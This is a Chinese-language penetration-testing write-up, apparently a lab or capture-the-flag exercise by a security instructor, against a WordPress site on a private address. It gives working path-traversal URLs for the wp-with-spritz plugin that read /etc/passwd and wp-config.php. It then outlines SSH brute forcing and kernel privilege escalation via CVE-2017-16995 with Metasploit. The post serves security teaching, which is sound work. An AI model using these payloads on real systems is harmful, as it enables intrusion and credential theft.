学习网络安全:记一次某网站渗透测试过程

本文作者:

汇智知了堂信安教学老师------辉哥

一、信息收集

网站界面


2.

网站信息收集

(1)中间件信息

(2)目录扫描

思路:由于是cms的站,针对这种情况,我们可以收集cms的默认目录结构来进行爆破或手动进行尝试

(3)专用工具扫描(wpscan)

服务器信息收集

(1)nmap 扫描

二、漏洞确认

统合收集的信息

(1)网站目录收集比较全

(2)知道各种中间件的版本

(3)Cms中存在插件可以下手

(4)端口打开有22、20、3389

(5)系统版本已知

确认漏洞

(1)根据wpscan报告来看插件wp-with-spritz 1.0存在文件遍历漏洞

漏洞文章:https://cxsecurity.com/issue/WLB-2018040215

思路:结合cms默认的目录结构可能可以获得敏感信息

(2)SSH弱密码爆破

思路:结合文件遍历漏洞,得到/etc/passwd中的用户

三、漏洞复现

利用插件的文件遍历漏洞

Payload1:

http://192.168.7.111//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

得到用户名webtester 可以用来SSH暴力破解

Payload2:

http://192.168.7.111/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

点击查看源代码

得到数据库名、账号和密码和flag

没有开数据库的端口,所以还是得先登录上去,只有SSH爆破了。。。。。。。

SSH爆破

得到密码

登录SSH

看看数据库

mysql --u root --p

提权

(1)查看系统内核信息

uname --a

lsb_release --a

(2)查看存在的提权漏洞

由于是ubuntu 16.04,存在cve-2017-16995本地提权漏洞漏洞,在msf中有相应的模块

先使用msf的ssh爆破功能创建会话

文章链接:https://blog.csdn.net/qq_24314631/article/details/79590177

(3)利用msf模块提权

先使用msf的ssh爆破模块登录ssh创建会话

创建会话后,使用提权模块进行提权

完成提权,找到最后的flag

相关推荐
dsywws7 分钟前
Linux学习笔记之时间日期和查找和解压缩指令
linux·笔记·学习
道法自然04028 分钟前
Ethernet 系列(8)-- 基础学习::ARP
网络·学习·智能路由器
爱吃生蚝的于勒14 分钟前
深入学习指针(5)!!!!!!!!!!!!!!!
c语言·开发语言·数据结构·学习·计算机网络·算法
cuisidong19972 小时前
5G学习笔记三之物理层、数据链路层、RRC层协议
笔记·学习·5g
南宫理的日知录2 小时前
99、Python并发编程:多线程的问题、临界资源以及同步机制
开发语言·python·学习·编程学习
jjyangyou2 小时前
物联网核心安全系列——物联网安全需求
物联网·算法·安全·嵌入式·产品经理·硬件·产品设计
AltmanChan3 小时前
大语言模型安全威胁
人工智能·安全·语言模型
马船长3 小时前
红帆OA iorepsavexml.aspx文件上传漏洞
安全
数据与后端架构提升之路3 小时前
从神经元到神经网络:深度学习的进化之旅
人工智能·神经网络·学习
一行13 小时前
电脑蓝屏debug学习
学习·电脑